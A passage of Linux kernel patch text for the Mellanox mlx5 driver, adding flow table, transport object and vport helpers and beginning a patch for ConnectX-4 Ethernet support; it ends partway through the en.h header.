*match_criteria, int *group_ix) +{ + void *mc_outer = MLX5_ADDR_OF(fte_match_param, match_criteria, + outer_headers); + void *mc_misc = MLX5_ADDR_OF(fte_match_param, match_criteria, + misc_parameters); + void *mc_inner = MLX5_ADDR_OF(fte_match_param, match_criteria, + inner_headers); + int mc_outer_sz = MLX5_ST_SZ_BYTES(fte_match_set_lyr_2_4); + int mc_misc_sz = MLX5_ST_SZ_BYTES(fte_match_set_misc); + int mc_inner_sz = MLX5_ST_SZ_BYTES(fte_match_set_lyr_2_4); + int i; + + for (i = 0; i < ft->num_groups; i++) { + struct mlx5_flow_table_group *g = &ft->group[i].g; + void *gmc_outer = MLX5_ADDR_OF(fte_match_param, + g->match_criteria, + outer_headers); + void *gmc_misc = MLX5_ADDR_OF(fte_match_param, + g->match_criteria, + misc_parameters); + void *gmc_inner = MLX5_ADDR_OF(fte_match_param, + g->match_criteria, + inner_headers); + + if (g->match_criteria_enable != match_criteria_enable) + continue; + + if (match_criteria_enable & MLX5_MATCH_OUTER_HEADERS) + if (memcmp(mc_outer, gmc_outer, mc_outer_sz)) + continue; + + if (match_criteria_enable & MLX5_MATCH_MISC_PARAMETERS) + if (memcmp(mc_misc, gmc_misc, mc_misc_sz)) + continue; + + if (match_criteria_enable & MLX5_MATCH_INNER_HEADERS) + if (memcmp(mc_inner, gmc_inner, mc_inner_sz)) + continue; + + *group_ix = i; + return 0; + } + + return -EINVAL; +} + +static int alloc_flow_index(struct mlx5_flow_table *ft, int group_ix, u32 *ix) +{ + struct mlx5_ftg *g = &ft->group[group_ix]; + int err = 0; + + mutex_lock(&ft->mutex); + + *ix = find_next_zero_bit(ft->bitmap, ft->size, g->start_ix); + if (*ix >= (g->start_ix + (1 << g->g.log_sz))) + err = -ENOSPC; + else + __set_bit(*ix, ft->bitmap); + + mutex_unlock(&ft->mutex); + + return err; +} + +static void mlx5_free_flow_index(struct mlx5_flow_table *ft, u32 ix) +{ + __clear_bit(ix, ft->bitmap); +} + +int mlx5_add_flow_table_entry(void *flow_table, u8 match_criteria_enable, + void *match_criteria, void *flow_context, + u32 *flow_index) +{ + struct mlx5_flow_table *ft = flow_table; + int group_ix; + int err; + + err = mlx5_find_group(ft, match_criteria_enable, match_criteria, + &group_ix); + if (err) { + mlx5_core_warn(ft->dev, "mlx5_find_group failed\n"); + return err; + } + + err = alloc_flow_index(ft, group_ix, flow_index); + if (err) { + mlx5_core_warn(ft->dev, "alloc_flow_index failed\n"); + return err; + } + + return mlx5_set_flow_entry_cmd(ft, group_ix, *flow_index, flow_context); +} +EXPORT_SYMBOL(mlx5_add_flow_table_entry); + +void mlx5_del_flow_table_entry(void *flow_table, u32 flow_index) +{ + struct mlx5_flow_table *ft = flow_table; + + mlx5_del_flow_entry_cmd(ft, flow_index); + mlx5_free_flow_index(ft, flow_index); +} +EXPORT_SYMBOL(mlx5_del_flow_table_entry); + +void *mlx5_create_flow_table(struct mlx5_core_dev *dev, u8 level, u8 table_type, + u16 num_groups, + struct mlx5_flow_table_group *group) +{ + struct mlx5_flow_table *ft; + u32 start_ix = 0; + u32 ft_size = 0; + void *gr; + void *bm; + int err; + int i; + + for (i = 0; i < num_groups; i++) + ft_size += (1 << group[i].log_sz); + + ft = kzalloc(sizeof(*ft), GFP_KERNEL); + gr = kcalloc(num_groups, sizeof(struct mlx5_ftg), GFP_KERNEL); + bm = kcalloc(BITS_TO_LONGS(ft_size), sizeof(uintptr_t), GFP_KERNEL); + if (!ft || !gr || !bm) + goto err_free_ft; + + ft->group = gr; + ft->bitmap = bm; + ft->num_groups = num_groups; + ft->level = level; + ft->type = table_type; + ft->size = ft_size; + ft->dev = dev; + mutex_init(&ft->mutex); + + for (i = 0; i < ft->num_groups; i++) { + memcpy(&ft->group[i].g, &group[i], sizeof(*group)); + ft->group[i].start_ix = start_ix; + start_ix += 1 << group[i].log_sz; + } + + err = mlx5_create_flow_table_cmd(ft); + if (err) + goto err_free_ft; + + err = mlx5_create_flow_table_groups(ft); + if (err) + goto err_destroy_flow_table_cmd; + + return ft; + +err_destroy_flow_table_cmd: + mlx5_destroy_flow_table_cmd(ft); + +err_free_ft: + mlx5_core_warn(dev, "failed to alloc flow table\n"); + kfree(bm); + kfree(gr); + kfree(ft); + + return NULL; +} +EXPORT_SYMBOL(mlx5_create_flow_table); + +void mlx5_destroy_flow_table(void *flow_table) +{ + struct mlx5_flow_table *ft = flow_table; + + mlx5_destroy_flow_table_groups(ft); + mlx5_destroy_flow_table_cmd(ft); + kfree(ft->bitmap); + kfree(ft->group); + kfree(ft); +} +EXPORT_SYMBOL(mlx5_destroy_flow_table); + +u32 mlx5_get_flow_table_id(void *flow_table) +{ + struct mlx5_flow_table *ft = flow_table; + + return ft->id; +} +EXPORT_SYMBOL(mlx5_get_flow_table_id); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c new file mode 100644 index 000000000000..3c555d708af1 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c @@ -0,0 +1,169 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include "mlx5_core.h" +#include "transobj.h" + +int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn) +{ + u32 out[MLX5_ST_SZ_DW(create_rq_out)]; + int err; + + MLX5_SET(create_rq_in, in, opcode, MLX5_CMD_OP_CREATE_RQ); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *rqn = MLX5_GET(create_rq_out, out, rqn); + + return err; +} + +int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen) +{ + u32 out[MLX5_ST_SZ_DW(modify_rq_out)]; + + MLX5_SET(modify_rq_in, in, rqn, rqn); + MLX5_SET(modify_rq_in, in, opcode, MLX5_CMD_OP_MODIFY_RQ); + + memset(out, 0, sizeof(out)); + return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); +} + +void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_rq_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_rq_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_rq_in, in, opcode, MLX5_CMD_OP_DESTROY_RQ); + MLX5_SET(destroy_rq_in, in, rqn, rqn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} + +int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn) +{ + u32 out[MLX5_ST_SZ_DW(create_sq_out)]; + int err; + + MLX5_SET(create_sq_in, in, opcode, MLX5_CMD_OP_CREATE_SQ); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *sqn = MLX5_GET(create_sq_out, out, sqn); + + return err; +} + +int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen) +{ + u32 out[MLX5_ST_SZ_DW(modify_sq_out)]; + + MLX5_SET(modify_sq_in, in, sqn, sqn); + MLX5_SET(modify_sq_in, in, opcode, MLX5_CMD_OP_MODIFY_SQ); + + memset(out, 0, sizeof(out)); + return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); +} + +void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_sq_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_sq_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_sq_in, in, opcode, MLX5_CMD_OP_DESTROY_SQ); + MLX5_SET(destroy_sq_in, in, sqn, sqn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} + +int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn) +{ + u32 out[MLX5_ST_SZ_DW(create_tir_out)]; + int err; + + MLX5_SET(create_tir_in, in, opcode, MLX5_CMD_OP_CREATE_TIR); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *tirn = MLX5_GET(create_tir_out, out, tirn); + + return err; +} + +void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_tir_out)]; + u32 out[MLX5_ST_SZ_DW(destroy_tir_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_tir_in, in, opcode, MLX5_CMD_OP_DESTROY_TIR); + MLX5_SET(destroy_tir_in, in, tirn, tirn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} + +int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn) +{ + u32 out[MLX5_ST_SZ_DW(create_tis_out)]; + int err; + + MLX5_SET(create_tis_in, in, opcode, MLX5_CMD_OP_CREATE_TIS); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *tisn = MLX5_GET(create_tis_out, out, tisn); + + return err; +} + +void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_tis_out)]; + u32 out[MLX5_ST_SZ_DW(destroy_tis_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_tis_in, in, opcode, MLX5_CMD_OP_DESTROY_TIS); + MLX5_SET(destroy_tis_in, in, tisn, tisn); + + mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h new file mode 100644 index 000000000000..1bc898cc4933 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h @@ -0,0 +1,47 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#ifndef __TRANSOBJ_H__ +#define __TRANSOBJ_H__ + +int mlx5_create_rq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *rqn); +int mlx5_modify_rq(struct mlx5_core_dev *dev, u32 rqn, u32 *in, int inlen); +void mlx5_destroy_rq(struct mlx5_core_dev *dev, u32 rqn); +int mlx5_create_sq(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *sqn); +int mlx5_modify_sq(struct mlx5_core_dev *dev, u32 sqn, u32 *in, int inlen); +void mlx5_destroy_sq(struct mlx5_core_dev *dev, u32 sqn); +int mlx5_create_tir(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tirn); +void mlx5_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); +int mlx5_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn); +void mlx5_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); + +#endif /* __TRANSOBJ_H__ */ diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c new file mode 100644 index 000000000000..ba374b9a6c87 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -0,0 +1,84 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include +#include +#include "vport.h" +#include "mlx5_core.h" + +u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod) +{ + u32 in[MLX5_ST_SZ_DW(query_vport_state_in)]; + u32 out[MLX5_ST_SZ_DW(query_vport_state_out)]; + int err; + + memset(in, 0, sizeof(in)); + + MLX5_SET(query_vport_state_in, in, opcode, + MLX5_CMD_OP_QUERY_VPORT_STATE); + MLX5_SET(query_vport_state_in, in, op_mod, opmod); + + err = mlx5_cmd_exec_check_status(mdev, in, sizeof(in), out, + sizeof(out)); + if (err) + mlx5_core_warn(mdev, "MLX5_CMD_OP_QUERY_VPORT_STATE failed\n"); + + return MLX5_GET(query_vport_state_out, out, state); +} + +void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) +{ + u32 in[MLX5_ST_SZ_DW(query_nic_vport_context_in)]; + u32 *out; + int outlen = MLX5_ST_SZ_BYTES(query_nic_vport_context_out); + u8 *out_addr; + + out = mlx5_vzalloc(outlen); + if (!out) + return; + + out_addr = MLX5_ADDR_OF(query_nic_vport_context_out, out, + nic_vport_context.permanent_address); + + memset(in, 0, sizeof(in)); + + MLX5_SET(query_nic_vport_context_in, in, opcode, + MLX5_CMD_OP_QUERY_NIC_VPORT_CONTEXT); + + memset(out, 0, outlen); + mlx5_cmd_exec_check_status(mdev, in, sizeof(in), out, outlen); + + ether_addr_copy(addr, &out_addr[2]); + + kvfree(out); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.h b/drivers/net/ethernet/mellanox/mlx5/core/vport.h new file mode 100644 index 000000000000..c05ca2c3419d --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.h @@ -0,0 +1,41 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#ifndef __MLX5_VPORT_H__ +#define __MLX5_VPORT_H__ + +#include + +u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod); +void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); + +#endif /* __MLX5_VPORT_H__ */ diff --git a/include/linux/mlx5/flow_table.h b/include/linux/mlx5/flow_table.h new file mode 100644 index 000000000000..5f922c6d4fc2 --- /dev/null +++ b/include/linux/mlx5/flow_table.h @@ -0,0 +1,54 @@ +/* + * Copyright (c) 2013-2015, Mellanox Technologies, Ltd. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#ifndef MLX5_FLOW_TABLE_H +#define MLX5_FLOW_TABLE_H + +#include + +struct mlx5_flow_table_group { + u8 log_sz; + u8 match_criteria_enable; + u32 match_criteria[MLX5_ST_SZ_DW(fte_match_param)]; +}; + +void *mlx5_create_flow_table(struct mlx5_core_dev *dev, u8 level, u8 table_type, + u16 num_groups, + struct mlx5_flow_table_group *group); +void mlx5_destroy_flow_table(void *flow_table); +int mlx5_add_flow_table_entry(void *flow_table, u8 match_criteria_enable, + void *match_criteria, void *flow_context, + u32 *flow_index); +void mlx5_del_flow_table_entry(void *flow_table, u32 flow_index); +u32 mlx5_get_flow_table_id(void *flow_table); + +#endif /* MLX5_FLOW_TABLE_H */ From f62b8bb8f2d30582f30f51e85a8c0e1260125d7e Mon Sep 17 00:00:00 2001 From: Amir Vadai Date: Thu, 28 May 2015 22:28:48 +0300 Subject: [PATCH 502/872] net/mlx5: Extend mlx5_core to support ConnectX-4 Ethernet functionality This is the Ethernet part of the driver for the Mellanox ConnectX(R)-4 Single/Dual-Port Adapter supporting 100Gb/s with VPI. The driver extends the existing mlx5 driver with Ethernet functionality. This patch contains the driver entry points but does not include transmit and receive (see the previous patch in the series) routines. It also adds the option MLX5_CORE_EN to Kconfig to enable/disable the Ethernet functionality. Currently, Kconfig is programmed to make Ethernet and Infiniband functionality mutally exclusive. Also changed MLX5_INFINIBAND to be depandant on MLX5_CORE instead of selecting it, since MLX5_CORE could be selected without MLX5_INFINIBAND being selected. Signed-off-by: Amir Vadai Signed-off-by: David S. Miller --- drivers/infiniband/hw/mlx5/Kconfig | 4 +- .../net/ethernet/mellanox/mlx5/core/Kconfig | 14 +- .../net/ethernet/mellanox/mlx5/core/Makefile | 3 + drivers/net/ethernet/mellanox/mlx5/core/cmd.c | 19 - drivers/net/ethernet/mellanox/mlx5/core/en.h | 520 +++++ .../ethernet/mellanox/mlx5/core/en_ethtool.c | 679 ++++++ .../net/ethernet/mellanox/mlx5/core/en_main.c | 1899 +++++++++++++++++ .../net/ethernet/mellanox/mlx5/core/main.c | 74 +- .../ethernet/mellanox/mlx5/core/mlx5_core.h | 9 +- include/linux/mlx5/device.h | 19 + include/linux/mlx5/driver.h | 1 + 11 files changed, 3213 insertions(+), 28 deletions(-) create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en.h create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c create mode 100644 drivers/net/ethernet/mellanox/mlx5/core/en_main.c diff --git a/drivers/infiniband/hw/mlx5/Kconfig b/drivers/infiniband/hw/mlx5/Kconfig index 10df386c6344..bce263b92821 100644 --- a/drivers/infiniband/hw/mlx5/Kconfig +++ b/drivers/infiniband/hw/mlx5/Kconfig @@ -1,8 +1,6 @@ config MLX5_INFINIBAND tristate "Mellanox Connect-IB HCA support" - depends on NETDEVICES && ETHERNET && PCI - select NET_VENDOR_MELLANOX - select MLX5_CORE + depends on NETDEVICES && ETHERNET && PCI && MLX5_CORE ---help--- This driver provides low-level InfiniBand support for Mellanox Connect-IB PCI Express host channel adapters (HCAs). diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig index 8ff57e8e3e91..0d7aef040fb0 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Kconfig +++ b/drivers/net/ethernet/mellanox/mlx5/core/Kconfig @@ -3,6 +3,18 @@ # config MLX5_CORE - tristate + tristate "Mellanox Technologies ConnectX-4 and Connect-IB core driver" depends on PCI default n + ---help--- + Core driver for low level functionality of the ConnectX-4 and + Connect-IB cards by Mellanox Technologies. + +config MLX5_CORE_EN + bool "Mellanox Technologies ConnectX-4 Ethernet support" + depends on MLX5_INFINIBAND=n && NETDEVICES && ETHERNET && PCI && MLX5_CORE + default n + ---help--- + Ethernet support in Mellanox Technologies ConnectX-4 NIC. + Ethernet and Infiniband support in ConnectX-4 are currently mutually + exclusive. diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Makefile b/drivers/net/ethernet/mellanox/mlx5/core/Makefile index 105780bb980b..87e9e606596a 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Makefile +++ b/drivers/net/ethernet/mellanox/mlx5/core/Makefile @@ -3,3 +3,6 @@ obj-$(CONFIG_MLX5_CORE) += mlx5_core.o mlx5_core-y := main.o cmd.o debugfs.o fw.o eq.o uar.o pagealloc.o \ health.o mcg.o cq.o srq.o alloc.o qp.o port.o mr.o pd.o \ mad.o +mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o transobj.o \ + en_main.o en_flow_table.o en_ethtool.o en_tx.o en_rx.o \ + en_txrx.o diff --git a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c index 2f22cd2de2b0..75ff58dc1ff5 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/cmd.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/cmd.c @@ -75,25 +75,6 @@ enum { MLX5_CMD_DELIVERY_STAT_CMD_DESCR_ERR = 0x10, }; -enum { - MLX5_CMD_STAT_OK = 0x0, - MLX5_CMD_STAT_INT_ERR = 0x1, - MLX5_CMD_STAT_BAD_OP_ERR = 0x2, - MLX5_CMD_STAT_BAD_PARAM_ERR = 0x3, - MLX5_CMD_STAT_BAD_SYS_STATE_ERR = 0x4, - MLX5_CMD_STAT_BAD_RES_ERR = 0x5, - MLX5_CMD_STAT_RES_BUSY = 0x6, - MLX5_CMD_STAT_LIM_ERR = 0x8, - MLX5_CMD_STAT_BAD_RES_STATE_ERR = 0x9, - MLX5_CMD_STAT_IX_ERR = 0xa, - MLX5_CMD_STAT_NO_RES_ERR = 0xf, - MLX5_CMD_STAT_BAD_INP_LEN_ERR = 0x50, - MLX5_CMD_STAT_BAD_OUTP_LEN_ERR = 0x51, - MLX5_CMD_STAT_BAD_QP_STATE_ERR = 0x10, - MLX5_CMD_STAT_BAD_PKT_ERR = 0x30, - MLX5_CMD_STAT_BAD_SIZE_OUTS_CQES_ERR = 0x40, -}; - static struct mlx5_cmd_work_ent *alloc_cmd(struct mlx5_cmd *cmd, struct mlx5_cmd_msg *in, struct mlx5_cmd_msg *out, diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h new file mode 100644 index 000000000000..cbb3c7cb53f7 --- /dev/null +++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h @@ -0,0 +1,520 @@ +/* + * Copyright (c) 2015, Mellanox Technologies. All rights reserved. + * + * This software is available to you under a choice of one of two + * licenses. You may choose to be licensed under the terms of the GNU + * General Public License (GPL) Version 2, available from the file + * COPYING in the main directory of this source tree, or the + * OpenIB.org BSD license below: + * + * Redistribution and use in source and binary forms, with or + * without modification, are permitted provided that the following + * conditions are met: + * + * - Redistributions of source code must retain the above + * copyright notice, this list of conditions and the following + * disclaimer. + * + * - Redistributions in binary form must reproduce the above + * copyright notice, this list of conditions and the following + * disclaimer in the documentation and/or other materials + * provided with the distribution. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, + * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF + * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND + * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS + * BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN + * ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN + * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE + * SOFTWARE. + */ + +#include +#include +#include +#include +#include +#include "vport.h" +#include "wq.h" +#include "transobj.h" +#include "mlx5_core.h" + +#define MLX5E_MAX_NUM_TC 8 + +#define MLX5E_PARAMS_MINIMUM_LOG_SQ_SIZE 0x7 +#define MLX5E_PARAMS_DEFAULT_LOG_SQ_SIZE 0xa +#define MLX5E_PARAMS_MAXIMUM_LOG_SQ_SIZE 0xd + +#define MLX5E_PARAMS_MINIMUM_LOG_RQ_SIZE 0x7 +#define MLX5E_PARAMS_DEFAULT_LOG_RQ_SIZE 0xa +#define MLX5E_PARAMS_MAXIMUM_LOG_RQ_SIZE 0xd + +#define MLX5E_PARAMS_DEFAULT_LRO_WQE_SZ (16 * 1024) +#define MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_USEC 0x10 +#define MLX5E_PARAMS_DEFAULT_RX_CQ_MODERATION_PKTS 0x20 +#define MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_USEC 0x10 +#define MLX5E_PARAMS_DEFAULT_TX_CQ_MODERATION_PKTS 0x20 +#define MLX5E_PARAMS_DEFAULT_MIN_RX_WQES 0x80 +#define MLX5E_PARAMS_DEFAULT_RX_HASH_LOG_TBL_SZ 0x7 +#define MLX5E_PARAMS_MIN_MTU 46 + +#define MLX5E_TX_CQ_POLL_BUDGET 128 +#define MLX5E_UPDATE_STATS_INTERVAL 200 /* msecs */ + +static const char vport_strings[][ETH_GSTRING_LEN] = { + /* vport statistics */ + "rx_packets", + "rx_bytes", + "tx_packets", + "tx_bytes", + "rx_error_packets", + "rx_error_bytes", + "tx_error_packets", + "tx_error_bytes", + "rx_unicast_packets", + "rx_unicast_bytes", + "tx_unicast_packets", + "tx_unicast_bytes", + "rx_multicast_packets", + "rx_multicast_bytes", + "tx_multicast_packets", + "tx_multicast_bytes", + "rx_broadcast_packets", + "rx_broadcast_bytes", + "tx_broadcast_packets", + "tx_broadcast_bytes", + + /* SW counters */ + "tso_packets", + "tso_bytes", + "lro_packets", + "lro_bytes", + "rx_csum_good", + "rx_csum_none", + "tx_csum_offload", + "tx_queue_stopped", + "tx_queue_wake", + "tx_queue_dropped", + "rx_wqe_err", +}; + +struct mlx5e_vport_stats { + /* HW counters */ + u64 rx_packets; + u64 rx_bytes; + u64 tx_packets; + u64 tx_bytes; + u64 rx_error_packets; + u64 rx_error_bytes; + u64 tx_error_packets; + u64 tx_error_bytes; + u64 rx_unicast_packets; + u64 